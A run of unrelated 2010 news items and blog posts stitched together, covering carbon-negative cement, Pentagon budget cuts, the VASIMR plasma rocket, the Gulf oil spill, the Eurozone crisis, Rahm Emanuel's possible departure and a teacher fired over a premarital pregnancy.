Calix , based in Sydney , Australia , this week filed a patent on a process to produce “ green ” cement through the rapid calcination of calcium magnesium carbonate particles , known as dolomite .
The particles are dropped into a vertical tube full of superheated steam , which causes the particles to explode into grains , increasing the overall surface area .
Those grains then react with the steam , oxidising the surfaces , says Calix ’s chief scientist Mark Sceats .
The residue is then ground into a powder and mixed with sand to form a powder known as Semidolime .
To produce the cement , Semidolime is mixed with water and power - plant flue gas , which typically contains significant levels of CO 2 .
Low energy
The use of superheated steam results in an energy - efficient method to manufacture cement – the fuel and electricity used during the process generates 14 kilograms of CO 2 for every tonne of concrete ultimately produced , the company claims .
The process does , however , release a pure stream of CO 2 , but this can be captured and compressed for geological storage , says Sceats .
What is more , this cement absorbs 21 kilograms of CO 2 per tonne of material as it hardens into concrete of the desired shape .
The net result is that for every tonne of concrete produced , the material removes 7 kilograms of CO 2 from the atmosphere .
The company is building a commercial site to produce the Semidolime , at Bacchus Marsh in Victoria , Australia , in which the captured CO 2 will be reused to set concrete slabs .
Hard water
Calix is not the only company with an eye on making cement a net absorber of CO 2 .
“ I would never have thought we would invest in cement , until someone came to me and told me they could reinvent cement and make it carbon negative , ” said venture capitalist Vinod Khosla of Khosla Ventures at the Green :
Net conference in San Francisco last month .
Khosla Ventures has invested in Calera , based in Los Gatos , California , which has developed a technique to absorb the CO 2 in hot power - plant flue gas with hard water to make cement .
The CO 2 reacts with the calcium and magnesium in the water to form solid carbonates and bicarbonates , which are then removed from the water and processed for use as cement , without any CO 2 having been produced in the process .
Changing the building blocks
Meanwhile London - based Novacem , a spin- out of Imperial College London , has replaced the limestone used in conventional Portland cement with magnesium silicates .
“ Given that there is 2.9 billion tonnes of Portland cement produced [ worldwide ] every year , we ’re talking about 2 billion tonnes of CO 2 that the industry produces , ” says Novacem ’s John Prendergast .
Half of that CO 2 is released in the calcination of limestone ; the other half comes from the fuel used to heat the reaction .
Magnesium silicates , in contrast , release far less CO 2 when heated .
To produce cement , the magnesium silicates are heated to 180 °C , causing them to form magnesium carbonates .
These are then further heated to 700 °C to produce magnesium oxide , producing a small amount of CO 2 in the process .
The resulting cement is a mixture of this magnesium oxide and some magnesium silicates .
Generating those sorts of temperatures is also less energy - hungry than Portland cement production , where limestone is heated with clay and sand to 1450 °C .
Low - carbon alternatives such as biomass can be used to reach the 700 °C needed to produce Novacem ’s cement , says Prendergast .
“ Novacem actually absorbs 100 kilograms of CO 2 per tonne of cement , ” he says .
The company has recently built a small pilot plant at Imperial College , which is now producing a few kilograms of cement per day .
It hopes to begin operating a semi-commercial plant in 2012 .
In the meantime , Novacem is adjusting the composition of the material to increase its strength .
At the moment the cement produced is strong enough for a range of non-structural applications such as paving stones , but within a year the company believes it will be suitable for use in more demanding applications .
The cement should be no more expensive to produce than Portland cement , it claims .
Read previous Green machine columns : Generating more light than heat , Cheaper home power from sunlight , Power from the people , Rethinking internal combustion engines .
ABILENE , Kan. — Defense Secretary Robert M. Gates challenged some sacrosanct Pentagon spending practices in a speech on Saturday , directing both military and civilian officials to find cuts in their overhead and operating costs and then transfer the savings to the fighting force .
In the speech , given on the 65th anniversary of the World War II victory in Europe , Mr. Gates said the Pentagon was wasting money it will no longer get , and he focused on targets as diverse as the cost of military health care , the large number of generals and admirals and the layers of bureaucracy involved just to send a dog team to Afghanistan .
“ The attacks of Sept. 11 , 2001 , opened a gusher of defense spending that nearly doubled the base budget over the last decade , ” Mr. Gates said .
“ Military spending on things large and small can and should expect closer , harsher scrutiny .
The gusher has been turned off , and will stay off for a good period of time . ”
Mr. Gates , a carry - over cabinet member from the Bush administration , has already canceled or trimmed several dozen weapons programs , with long - term savings predicted at $ 330 billion .
Now he is looking for complementary cuts across the Defense Department ’s civilian and military bureaucracies , the overseas headquarters and their operating costs .
NewsAlert
Sign up for our NewsAlert service and have the latest news in astronomy and space e-mailed direct to your desktop .
Enter your e-mail address :
Privacy note : your e-mail address will not be used for any other purpose .
Plasma rocket could revolutionize space travel
BY STEPHEN CLARK
SPACEFLIGHT NOW
Posted : June 1 , 2010
The headquarters of Ad Astra Rocket Co. does n't catch the eye , at least until you step inside .
Inside an unsuspecting warehouse in suburban Houston , hidden behind a streetcorner strip mall , a team of elite engineers and enterprising physicists is busy developing a high - tech plasma rocket designed to carry humanity to the stars .
Founded in 2005 , the company accomplishes most of its work just a few minutes from Johnson Space Center , the home of Mission Control .
The company 's main project is the Variable Specific Impulse Magnetoplasma Rocket , or VASIMR , a highly - efficient space engine running on electricity and argon gas instead of conventional solid or liquid propellants .
Franklin Chang - Diaz , the project 's chief architect , says the VASIMR engine is the most flight - ready high - power electric propulsion system anywhere in the world .
" It is transformational technology that we are developing , " Chang - Diaz said .
" It always has been my view that chemical approach to space transportation really was not going to get us very far . "
The VASIMR ground engine fires during testing in May .
Credit : Stephen Clark / Spaceflight Now
Chemical rocket engines require spacecraft to carry all of its propellant during its mission .
The VASIMR engine burns small amounts of argon gas , one of the most stable elements on the periodic table .
But one of the most revolutionary features of the VASIMR design is its reliance on electricity , a renewable resource in space .
" It 's very robust , but in order to get beyond the moon , and move on to Mars and beyond , we really need completely new transportation technology , " Chang - Diaz said .
" We view the VASIMR as the workhorse for that transportation infrastructure . "
Electrically - powered plasma rockets could cut travel times for missions across the solar system .
One concept championed by Chang - Diaz involves a 39 - day mission to Mars , but it assumes leaps in nuclear energy production in space .
Originally bankrolled by NASA , the VASIMR project has gone from the drawing board to reality since the plasma rocket research was privatized in 2005 .
Inside Ad Astra 's laboratories in Houston and Costa Rica , rocket designers have pushed the VASIMR engine closer to flight .
" In five years , we 've made some pretty big jumps , in terms of power capability and the efficiency of the plasma source , " said Tim Glover , Ad Astra 's director of development .
NASA measures emerging technologies on a readiness scale from 1 to 10 .
" When the technology is ready to fly is when you get to a level 6 , " Chang - Diaz said .
" Level 7 is the actual flight . "
The VASIMR engine is already at level 6 , according to Chang - Diaz , who has worked on plasma rocket technology since the 1970s .
" I always felt there was a way to use that high - temperature plasma to develop a rocket engine that could go a lot faster than the rockets that we have today , " Chang - Diaz said .
But Chang - Diaz was sidetracked by a second career as an astronaut after his selection by NASA in 1980 .
The 60 - year - old is one of only two space fliers to complete seven missions on the final frontier .
In between training for space shuttle missions , Chang - Diaz led plasma research first at the Massachusetts Institute of Technology , then at NASA 's Johnson Space Center .
But NASA decided to cancel advanced propulsion research to pay for the Constellation program to return humans to the moon , forcing the work into the private sector in 2005 .
" Facing such dire possibilities on our project , I proposed to NASA that we privatize it , " Chang - Diaz said .
" Much to my amazement , they agreed that it would be a good idea .
That 's how Ad Astra Rocket Co. was born , out of a privatization agreement with NASA , where the laboratory that I used to lead was transformed into a private entity . "
Chang - Diaz secured investments from the United States , Europe and his native Costa Rica summing several tens of millions of dollars , a figure he says is ten times more than NASA ever spent on the project .
The company now employs about 40 workers in Houston and Costa Rica .
The influx of funding has propelled the VASIMR engine from a readiness level of 2 to 6 since the laboratory was privatized .
" That happened in five years , and we only got from 0 to 2 in 25 years , " Chang - Diaz said .
" It 's been a very drastic progress in the last five years .
That 's what happens when you have money . "
But the Obama administration 's proposal to cancel the Constellation program and refocus NASA on nurturing new technologies for solar system exploration has put VASIMR in the limelight .
" President Obama has decided that NASA needs to go back to its roots and continue to fund projects of advanced technology , " Chang - Diaz said .
" We 've almost come full circle , and we find ourselves at the point where NASA is interested again . "
A diagram of the VASIMR engine .
From right to left , the argon gas is injected into the engine , the gas is ionized in the engine 's first stage , super - heated in the second stage , then directed through the nozzle by superconducting magnets .
Credit : NASA
And Chang - Diaz 's cozy friendship with NASA chief Charles Bolden does n't hurt either , Glover said .
Chang - Diaz flew with Bolden on two shuttle flights and remain close friends today .
" Charlie and I are very good friends , " Chang - Diaz said .
" I think he's got the right approach in bringing people together .
He certainly has the right personality and the right level of technical knowledge . "
Bolden has cited VASIMR as an example of the new technologies NASA should be pursuing .
" One thing that will help will be to let somebody like Dr. Franklin Chang - Diaz or somebody who 's studying ion engines help us develop a game - changing interplanetary engine that will cut the time to go to Mars in half , " Bolden said in a news conference earlier this year .
Ad Astra officials say they welcome NASA interest in the project , but they insist on continuing the engine 's development in the private sector .
" I do n't want to put NASA in the critical path because you never know what 's going to happen with NASA , " Chang - Diaz said .
" I would n't consider it very reliable at this moment . "
Ad Astra is currently testing a two - stage ground version of the VASIMR engine inside a vacuum chamber in Houston .
The 200 - kilowatt engine , called the VX - 200 , looks nothing like a conventional rocket engine .
The powerplant lacks the combustion chamber found on contemporary boosters .
The company successfully tested the ground engine to its 200 - kilowatt design standard in late 2009 , but those power levels were only achieved in short bursts lasting just a fraction of a second .
Engineers plan more testing of the VX - 200 to eventually accomplish longer firings .
Ground testing so far has relied on low - temperature superconducting coils , but more ambitious demonstrations in space will use more durable materials capable of withstanding much higher temperatures and longer burn durations .
" The high - temperature superconducting tape is an enabling technology to us , " Glover said .
Plasma inside the VASIMR engine is constrained by the powerful coils of a superconducting magnet , a key technological breakthrough that binds the engine together by accelerating the super - heated plasma to produce propulsive force .
The engine 's argon fuel first passes through the assembly 's first stage , where the gas is ionized as electrons are stripped from argon atoms .
The first stage , also called the helicon section , heats the gas to about 10,000 Kelvin , or 17,540 degrees Fahrenheit , said Jared Squire , Ad Astra 's director of research .
" It 's the same thing you do in a steam engine , where you first boil water to make steam , " Squire said .
" You 're heating the gas , and that 's where the plasma is formed . "
The VASIMR engine 's second stage applies more electromagnetic power to the plasma in a process called ion cyclotron heating .
The plasma spills out of the engine nozzle at more than 110,000 mph .
The exhaust can reach temperatures of up to 1.8 million degrees Fahrenheit , according to Squire .
Officials plan to work out the kinks in the technology before launching flight engines to the International Space Station by 2014 for an orbital demo .
Glover said the station tests will use two engines operating at 100 kilowatts .
The 10,000 - pound engine package will be launched on one of the commercial cargo carriers being developed by SpaceX and Orbital Sciences .
An early concept of the VASIMR engine on the International Space Station .
Credit : NASA
VASIMR 's opportunity to fly on the space station came through a Space Act Agreement signed with NASA in 2008 .
The contract , which does not include an exchange of funds , stipulates Ad Astra and NASA must pass through five milestones before the test flight .
The parties already completed a payload integration agreement , and the next step will be the VASIMR engine 's preliminary design review in 2011 .
Ad Astra hopes the VASIMR engine could be used to reboost the space station after it completes its demonstration objectives .
" If the ISS is really extended well into the 2020s , then the international partners might agree they would like to do reboost using electric propulsion , " Glover said .
" You would likely have to wait until present agreements to do reboost with [ Europe and Russia ] are ending , then you could say Ad Astra has already demonstrated this system on the ISS .
Why do n't we consider how much money we could save by moving this back and using it for reboost ? "
Glover said such a move would save the station program $ 200 million and 7 metric tons of propellant each year .
That money and mass could be diverted for other scientific experiments aboard the complex .
But Ad Astra has set its sights even higher than Earth orbit .
The company believes the VASIMR will make voyages to Mars and asteroids a reality .
It just so happens those places are the new destinations for NASA 's human exploration plans , which would bypass the moon , for now .
" We have to get to Mars fast , " Chang - Diaz said .
" It ca n't take six , or seven , or eight months to get to Mars .
That is just asking for trouble . "
Even if chemical rockets get humans to Mars , the program will be unsustainable because of the lengthy journey and high cost , according to Chang - Diaz .
" These engines that we 're developing are inherently high - power engines .
These are n't little thrusters , these are very powerful engines , which can scale up to tens of megawatts , " Chang - Diaz said .
Those megawatt - class engines will be required for any substantial presence in the solar system .
The 200 - kilowatt engine now under development is best suited for work in Earth orbit or in multi-engine clusters .
But is a 39 - day manned trip to Mars really possible ?
Ad Astra says yes , with caveats .
It would require major advancements in nuclear power and a departure point somewhere high above Earth .
Ad Astra 's concept for a VASIMR - powered spacecraft on the way to Mars .
Credit : Ad Astra
" The ship for a 39 - day mission to Mars is not that much different than a 747 jumbo jet , in terms of power , " Chang - Diaz said .
" When they hear we want to use a 200 - megawatt ship to go to Mars , people cringe and wring their hands , and say how are you going to get that much power ? "
Current technology can't produce enough electricity in space to drive multiple megawatt - class high - power plasma engines for weeks at a time .
" That takes a really lightweight power supply , around 1 kilogram per kilowatt , which is probably ultimately doable , " Glover said .
According to Glover , the most important measure for the efficiency of plasma engines is the weight - to - power ratio , or the number of kilograms needed to generate a kilowatt of electricity .
Flat panel solar arrays today have a ratio of about 20 kilograms , or 44 pounds , for every kilowatt of power they produce .
The best nuclear reactors designed for spaceflight have a specific mass of about 45 kilograms , or nearly 100 pounds .
The Pentagon and Boeing Co. are developing a next - generation solar array aimed at reaching a weight - to - power ratio of 7 kilograms per kilowatt , according to the Defense Advanced Research Projects Agency .
Engineers predict nuclear power generators will reach an efficiency of a few kilograms per kilowatt within a couple of decades .
Even if 39 - day trips to Mars are still a distant dream , Ad Astra officials are confident the journey time for smaller missions can be cut by more than half by the 2020s with imminent breakthroughs in solar array technology .
" While solar technology is very impressive and it can be used to do some technology demonstrations soon , it 's not going to get us very far .
Ultimately , you need to have nuclear power if you want to do big things out there . "
Scientists provided a new estimate for the amount of oil gushing from the ruptured well in the Gulf of Mexico on Tuesday that indicates it could be leaking up to 2.52 million gallons of crude a day .
“ That is roughly 2.5 million gallons of oil a day , and it means an amount equal to the Exxon Valdez spill could be gushing from the well about every four days , ” the New York Times notes .
ADVERTISEMENT
A government panel of scientists said that the ruptured well is leaking between 1.47 million and 2.52 million gallons of oil daily .
The figures move the government ’s worst - case estimates more in line with what an independent team had previously thought was the maximum size of the spill .
“ This estimate brings together several scientific methodologies and the latest information from the sea floor , and represents a significant step forward in our effort to put a number on the oil that is escaping from BP ’s well , ” Energy Secretary Steven Chu said in a statement .
The latest numbers reflect an increase in the flow that scientists believe happened after undersea robots earlier this month cut off a kinked pipe near the sea floor that was believed to be restricting the flow of oil , just as a bend in a garden hose reduces water flow .
BP officials has estimated that cutting the kinked pipe likely increased the flow by up 20 percent .
The pipe was removed so BP could install a containment cap that is trapping leaking oil and drawing it a ship waiting on the ocean surface .
The new numbers are based on a combination of scientific data , including an analysis of high - resolution video taken by underwater robots , pressure meters , sonar , and measurements of oil collected by the containment device on top of the well .
ADVERTISEMENT
It is the fourth Ã¢â‚¬â€ and perhaps not last Ã¢â‚¬â€ time the federal government has had to increase its estimate of how much oil is gushing .
At one point , the federal government claimed only 42,000 gallons were spilling a day and then it upped the number to 210,000 gallons .
As of Tuesday , the maximum amount of oil that has gushed out of the well since the April 20 explosion is 116 million gallons , according to the estimates by scientists advising the federal government .
BP PLC now has a containment system in place in the Gulf of Mexico that has been capturing nearly 648,000 gallons of oil daily .
That system was forced to shut down as a precaution Tuesday morning because of a fire on a ship connected to it .
BP said the collection system was not damaged and about five hours after the fire , the containment operations resumed .
ADVERTISEMENT
Under pressure from the federal government , BP plans to gradually expand its ability to capture the flow of oil until a relief well can permanently end the leak sometime in August .
The collection system could expand to a peak capacity of 2.2 million gallons of oil by the end of June and up to roughly 3.4 million gallons of oil by mid July .
People — including organizations — respond to incentives .
But rarely do we create incentives for doing good .
Rather , we tend to create disincentives — legal liability , bad press , boycotts , etc. — for doing bad things .
We see this reflected in everyday life .
When running for political office , candidates will mention their successes , sure , but the discourse focuses on the failures of their opponents .
( Quickly : name one positive thing John Kerry or Sarah Palin did . )
Google ’s informal motto , “ Do n’t Be Evil , ” sums up the incredibly low bar of expectations from corporations while simultaneously focusing on the negative stuff they do n’t do , rather than their actual philanthropic work .
And with oil gushing into the Gulf of Mexico , a boycott of BP makes emotional sense — but why has n’t there been a concerted effort to patronize , as a society , the oil companies which are doing the most work ( and investing the most resources ) into cleaner - burning fuel alternatives ?
Do you even know which company that would be ?
I do n’t , but I feel like I should .
We rightly place disincentives on doing evil .
But we rarely celebrate the good work done in this world .
Maybe it ’s just too much work and not worth our time .
Maybe it needs to be easier .
I ’ve been thinking about this problem for about a week , after synthesizing a lot what I learned from Internet Week NYC events .
I concluded that we need to make a concerted effort to celebrate the good in this world , and that Twitter makes that easy , so I registered @CelebrateGood and followed some causes .
( I am not sure yet what I want to do with @CelebrateGood yet — I have n’t even found a good icon ! — but it probably wo n’t focus on non-profits .
I ’ll outline my basic thinking in another post . )
Apparently , I ’m not alone in seeing this opportunity .
This week , serial entrepreneur Jeff Pulver announced his new project , JustCoz.org .
JustCoz uses
Twitter to make it easy to celebrate some of the good work which is being done in this world — and it ’s fantastic .
Pulver , the founder of the 140 Characters Conference , is super - invested in the disruptive effects of Twitter and real - time engagement , so it should surprise no one that JustCoz leverages tweets — or rather , non-tweets .
Realizing that you can only share good news — retweet it , basically — when you are actually looking at Twitter , Pulver and company saw an opportunity : what if supporters of causes could automatically retweet the tweets of the causes they support ?
If Doctors Without Borders makes a big announcement while you are on a trans -Atlantic flight , JustCoz will spread it to your followers for you .
Automatically .
Noting that personally passed - along tweets are more likely to spread ( note the asterisk ) , JustCoz believes that if we donate our tweets — actually , our idle Twitter time — we , collectively , can spread good rapidly and to orders of magnitude more people .
Whether this works , who knows ; hopefully , it will .
But the important story here is that people —
Pulver and his team — are taking pro-active steps to leverage social media to celebrate the good in this world .
I hope more people join that mission .
A lack of representative governance is playing havoc with the future of the Eurozone , and its cause is a democratic initiative from the German high court whereby it placed limits on the power of the executive to give away its authority to govern without reference to the elected parliament .
The constitutional court ruled that the Bundestag must be given a full vote before further power is transferred to Brussels , and further stating that ultimate sovereignty must rest with the member states .
German parliamentary sovereignty is now threatening the future of the Eurozone , and by extension the wider economic recovery of EU as a whole .
A nation - state is effectively a collective agreement that a people are a family , who have sufficient trust in each other to accept indirect governance from representatives of the prevailing will of a majority , it is also a collective agreement to work together for the benefit of the whole rather than the individual .
In short it is a marriage which results in a transfer union .
Inevitably there will be richer and poorer parts of the nation - states economy , and if that economy is not to tear itself apart from the strife resulting from a polarising divergence in wealth then there must be a compact agreed by the people that national taxation will be redistributed in a manner the assists less advantaged areas .
In short the rich pay for the poor .
This compact is seen in every developed country , by way of social benefits applied equally throughout the territory , by way of regional development funds to promote wealth creation in poor performing areas , and by concentrating public sector activity in areas of reduced economic potential .
It is fundamental to the cohesion and harmony of the society .
This is where the federalist ideology of the EU begins to face problems .
First , there is a massive disparity in wealth between the nations that supposedly have the aim of becoming a single ‘ people , far greater in fact than is true of the wealth disparity within the constituent nations themselves .
Second , there is no single ‘ people ’ within the EU , thus there is no collective agreement to accept governance because it is not seen to be representative , and likewise there is no collective agreement to work to the benefit of the whole because that lack of representation prevents trust that paying money to others will be both used responsibly and reciprocated in time of need .
This is where the implementation of the EU begins begins to face problems .
First , to get around the problem of a transfer union being unacceptable to the separate peoples who have no collective sense of ‘ family ’ the Eurozone was created as a monetary union instead of an economic union .
The single currency was to apparently able maintain its perceived value purely by having agreed targets on a budget deficit of less than three per cent of their GDP , a debt ratio of less than sixty per cent of GDP , low inflation , and interest rates close to the EU average .
So regardless of the wealth disparity , regardless of the size and acceptance of the black economy , regardless of the potential for abuse from weak members exploiting the low borrowing rates of the strong , and regardless of the inability of national governments to use the economic levers available to sovereign nations to ameliorate the boom - n - bust cycle , the Eurozone was somehow supposed to work .
If the effectiveness of a system can be be judged by its response to a crisis then monetary union can be judged to be a massive failure .
Germany ’s massive and competitive export driven economy has priced other members out of the market , as there is only one currency value across the Eurozone .
Likewise the weaker club - med economies bypassed their lack of competitiveness by massive borrowing at artificially low rates on the back of franco - german economic strength .
The result is clear ; the PIGS have to rollover 700bn Euros of government debt before the end of 2011 at a time when the global financial crisis has killed economic growth across the EU , and to make things worse Germany is demanding fiscal austerity in return for agreeing to bail out their beleaguered economies , an act that will further depress economic activity and thus reduce their ability to rollover debt .
The PIGS cannot pay the money back because there is no growth to do so , and they cannot borrow any further because the markets realise that any further lending is very risky and are thus charging punitive rates .
The potential for a debt - deflation spiral hovers over club -med .
Second , the result of the fundamental flaws of monetary union have forced the peoples of the non- Mediterranean countries to club together 700bn Euro’s of their money as surety against a sovereign debt crisis within the PIGS .
Worse still , the survival of the Euro and its fixed internal exchange rate is forcing the currently uncompetitive PIGS to accommodate the crisis by shedding jobs rather than devaluing their currency .
So we have a situation where the peoples of europe are being driven further apart by distrust and ill - feeling , the German people in particular are highly reluctant to give money that can never be paid back to people they do n’t trust to act responsibly , and likewise the Greeks are up in arms at the prospect of having their economy trashed by fiscal austerity imposed on them in lieu of a devaluation .
And here we come back to the German constitutional ruling on parliamentary sovereignty .
The logical actions to take in this situation are twofold :
1. Allow Greece to restructure its debt and effectively leave the Eurozone
2. Bring about economic union of the Eurozone and accept a tacit transfer union
However the first is not possible because France is ideologically attached to the political ambitions that a united Eurozone represents , and the latter is impossible to entertain because the German Chancellor will get drummed out of office if she asks the Bundestag to agree to economic union with countries deemed pathologically irresponsible .
It would be easy to see France as the idealist in contrast to Germany ’s pragmatism , but in reality France occupies both those positions by holding to the ambitions of ever - deeper-union and holding the solution to a flawed monetary union , Germany is merely a country trapped between those two positions .
The scale of the problem Germany is posing is aptly illustrated by comments from George Soros :
Legendary investor George Soros has called on Germany to leave the euro unless it willing to embrace a growth strategy , describing Berlin ’s austerity doctrine as a threat to democracy and political stability in Europe .
“ German policy is becoming a danger that could destroy the European Project .
A collapse of the euro cannot be excluded , ” “ Unless Germany changes policy , its withdrawal from the currency union would be helpful for the rest of Europe .
At the moment Germany is pushing its neighbours into deflation : this threatens a long phase of stagnation , leading to nationalism , social unrest , and zenophobia .
It endangers democracy , ” Mr Soros said Germany was treating the deeply - flawed Maastricht Treaty as it were a “ sacred text ” , warning that monetary union cannot endure for long as a narrow construct based on debt and deficit ceilings .
He said wage rises in Germany are imperative to help lift the whole eurozone , allowing peripheral economies to claw their way out of trouble without fighting the extra headwinds of deflation .
“ The truth is that what we have in Europe is not a currency or sovereign debt crisis as many people think , but a banking crisis , ” he said .
Mr Soros argued that the weaker states cannot easily fund their deficits any longer because some banks are purchasing fewer bonds as a result of damaged balance - sheets .
Are the German people to be blamed for being unwilling to bail - out the club - med nations ?
Possibly , it is after all their job to inform their elected representatives about their willingness to join as one with another people , they should have considered the consequences beforehand rather than complain about them now .
Is the German parliament to be blamed for its reluctance to rubber - stamp the economic union that might save the political ambitions implicit in the Euro ?
Patently not , it is their job to represent their electorate , and if their electorate wo n’t wear it then they should not agree to it .
Is the German constitutional court to be blamed for introducing a ruling that makes it difficult for the executive to overrule the will of the people and their elected representatives ?
Patently not , an executive that is not accountable to , and acts against the wishes of , the people is plainly a tyranny .
Is Chancellor Merkel to blame for being unable to force Germany to accept the loss of sovereignty necessary to save political union within the EU ?
Yes , absolutely , she sits in the top - spot and must carry ultimate responsibility for presiding over a government that has acted in a way perceived to be inimical to the interests of the people she is supposed to represent .
What can Germany do to remove itself from this bind ?
Well , it could follow Soros ’s advice and exit the Euro , but it might be a good idea to first consult the people on that most fundamental of questions ;
“ Who governs me ? ”
If the answer is “ my ” government then clearly Germany should exit a what is a political project , if not then it is time to admit that the Bundestag cannot be sovereign , because to quote Gladstone :
The finance of the country is intimately associated with the liberties of the country .
It is a powerful leverage by which English Liberty has been gradually acquired …
It lies at the root of English Liberty , and if the House of Commons can by any possibility lose the power of the control of the grants of public money , depend upon it , your very liberty will be worth very little in comparison … That power can never be wrenched out of your hands …
That powerful leverage has been what is commonly known as the power of the purse – the control of the House of Commons over public expenditure – your main guarantee for purity – the root of English liberty .
No violence , no tyranny , whether of experiments or of such methods as are likely to be made in this country , could ever for a moment have a chance of prevailing against the energies of that great assembly .
No , if these powers of the House of Commons come to be encroached upon , it will be by tacit and insidious methods , and therefore I say that public attention should be called to this .
So what will it be , a shrunken post - crisis Eurozone with economic union , or a return to a softer monetary union based on the Ecu ‘ basket of currencies ’ held by sovereign nation states ?
Update – 25/06/10
Interesting UKDF blogspot article on how the Eurozone crisis is causing Germany to build a partnership with Russia , to the unease of both France & Poland :
The Germans have been developing economic relations with Russia since before the Soviet collapse , but the Greek crisis forced them to reconsider their relationship with Russia .
If the European Union was becoming a trap in which Germany was going to consistently subsidize the rest of Europe , and a self - contained economy is impossible , then another strategy would be needed .
This consisted of two parts .
The first was insisting on a restructuring of the European Union to protect Germany from the domestic policies of other countries .
Second , if Europe was heading toward a long period of stagnation , then Germany , heavily dependent on exports and needing labor , needed to find an additional partner — if not a new one .
While checking out some news sites this morning , I found a story that will make you very happy you have the ability to drive to the Wally World , buy all the rods , reels , stink bait , and plastic worms your heart desires , then jump on your boat and use them .
These things are not easy to come by in Cuba , and the government heavily regulates who can operate and own a boat due to illegal immigration .
But one thing you can buy at three for a penny in Cuba is condoms .
Turns out the Cubans have found many uses for them that go far beyond the bedroom .
English :
This is a gallery of flags with a flag as part of its design .
For flags with another flag in its canton , see flags with cantons # Flag cantons
Report : Rahm Emanuel To Leave White House After November Elections
Doug Mataconis · · 9 comments
The London Telegraph is reporting that President Obama ’s Chief of Staff may be headed out the door after the mid-term elections are over :
Rahm Emanuel , the White House chief of staff , is expected to leave his job later this year after growing tired of the “ idealism ” of Barack Obama ’s inner circle .
Washington insiders say he will quit within six to eight months in frustration at their unwillingness to “ bang heads together ” to get policy pushed through .
Mr Emanuel , 50 , enjoys a good working relationship with Mr Obama but they are understood to have reached an understanding that differences over style mean he will serve only half the full four - year term .
Friends say he is also worried about burnout and losing touch with his young family due to the pressure of one of most high profile jobs in US politics .
“ I would bet he will go after the midterms , ” said a leading Democratic consultant in Washington .
“ Nobody thinks it ’s working but they ca n’t get rid of him – that would look awful .
He needs the right sort of job to go to but the consensus is he ’ll go . ”
An official from the Bill Clinton era said that “ no one will be surprised ” if Mr Emanuel left after the midterm elections in November , when the Democratic party will battle to save its majorities in the house of representatives and the senate .
It is well known in Washington that arguments have developed between pragmatic Mr Emanuel , a veteran in Congress where he was known for driving through compromises , and the idealistic inner circle who followed Mr Obama to the White House .
Several thoughts come to mind .
First , I ’ve been expecting staff changes at the White House for some time now .
It ’s fairly clear that Obama is not being served well by some of the men and women in the West Wing .
Personally , I ’ve thought for some time now that the changes need to be made in the Communications staff , but it also appears that there are clashes between the “ idealists ” on the staff and those like Emanuel more concerned with actual governing :
There were sharp differences over health care reform , with Mr Emanuel arguing that public hostility about cost should have forced them into producing a scaled down package .
Mr Obama and advisers including David Axelrod , the chief strategist , and Valerie Jarrett , a businesswoman and mentor from Chicago , decided to push through with grander legislation anyway .
Emanuel ’s departure , then , could be taken as a sign that the idealists have won the ground war inside the West Wing and there are some bloggers who are making the leap into assuming that Emanuel ’s departure is a sign that Obama will be facing a serious challenger for the Democratic nomination in 2012 by a pragmatist .
There is , however , a far different explanation for why Emanuel may be leaving that makes a lot more sense :
Mr Emanuel has privately expressed a readiness to run for mayor of Chicago , which is also his home town though he was never part of the Obama set and did not endorse the then senator in the Democratic primary in 2008 .
That would however depend on Mayor Richard Daley stepping down when he is up for re-election in 2011 .
The Chicago Mayor ’s office is something that Emanuel has had in his sights for long before Barack Obama asked him to leave Congress to become White House Chief of Staff .
In April , as a matter of fact , he made those ambitions clear :
White House Chief of Staff Rahm Emanuel yearns for the day when he again holds elected office — and has retained his $ 1.2 million war chest to help make that happen .
Emanuel , 50 , told PBS ’ Charlie Rose on Monday he wants to be mayor of Chicago , leaving behind a one - time goal of becoming Speaker of the House .
But , Emanuel added , he is a loyal supporter of the current mayor , Richard M. Daley , and hopes he will run again .
While exalted in Washington , Emanuel back home is just one of a string of political figures waiting to see if Daley seeks another term next February .
The announcement from Emanuel triggered this reaction from the Chicago Sun- Times ’ Fran Spielman , a veteran City Hall reporter : “ Get in line , ” she wrote .
Emanuel is “ is trying to mark his turf as the heir apparent to Mayor Daley by declaring his intention to run if his friend chooses not to seek a seventh term .
But he ’s hardly the only one salivating on the sidelines while awaiting Daley ’s decision .
Nor is he , necessarily , the frontrunner in that crowded field , ” Spielman wrote
An Emanuel departure in November would be just enough time for him to start a campaign for Mayor for the election in February should Daley decided not to run .
Assuming all this is true , the next question becomes who replaces Emanuel .
Let the speculation begin !
Teacher Fired for Becoming Pregnant Out of Wedlock Woman conceived just days before wedding .
School fired her for " fornication . "
June 11 , 2010  --
When Jarretta Hamilton , a fourth grade teacher at a Florida Christian school , told administrators she was pregnant , she expected them to ask when she was due .
She did not , however , think her answer would get her fired .
In April 2009 , Hamilton told her boss at Southland Christian School in St. Cloud , Fla. , that she was pregnant and planned to take a six - week leave in October .
When asked when she conceived , Hamilton answered honestly :
She became pregnant just three weeks prior to her Feb. 20 wedding .
That was enough to get her fired under the school 's strict morality rules , which prohibit teachers from " fornication , " engaging in sex before marriage .
" Jaretta was asked not to return because of a moral issue that was disregarded , namely fornication , sex outside marriage , " administrator Julie Ennis wrote in a letter to Hamilton 's lawyer .
Now , Hamilton is suing the school in federal court , seeking damages for lost wages and emotional distress .
" She was incredibly upset about being fired , " Hamilton 's lawyer Edward Gay told ABCNews.com .
" She was upset that she was n't able to complete the term with less than two months left in the school year and upset that her fourth graders were told about this . "
According to Gay , Hamilton filed a complaint with the Equal Employment Opportunity Commission , but opted out of mediation and chose instead to file suit because of the commission 's lengthy backlog .
According to the complaint , Hamilton is suing under federal gender discrimination laws , a state marriage discrimination law and for violations of her privacy .
" The school told the students and their parents why Hamilton had been fired .
Disclosing that kind of personal information was a violation of her privacy , " Gay said .
" There were never any complaints about her teaching .
The school said she was an outstanding teacher , " he added .
The school does not dispute the reasons for firing Hamilton , calling sex outside of marriage " an immoral action , " but argues that her termination does not rise to discrimination because it employs other pregnant women .
In a letter to Gay , school administrator Julie Ennis wrote : " Jarretta was asked not to return because she chose to disregard these [ school morality ] standards and have sex outside of marriage , an immoral action . "
" In response to the first claim that she was fired because she was pregnant this is not true , " Ennis wrote .
" We do have teachers employed that are pregnant , two just last year while Jarretta was employed here . "
When reached by ABCNews.com , Principal Rod Ennis , Julie 's husband , said the school had no comment , but was surprised to learn Hamilton had opted out of the EEOC mediation .
" At this point , we 're not making any comment , " said Rod Ennis .
" We were aware of the EEOC and were going to go to mediation . "
Gay said Hamilton learned she had become pregnant only after she and her husband married and the wedding had been planned months in advance .
" She was intending on marrying this man and did n't know she was pregnant , " he said .
" They did n't get married because of the pregnancy .
They did n't know until later , after they were already married . "
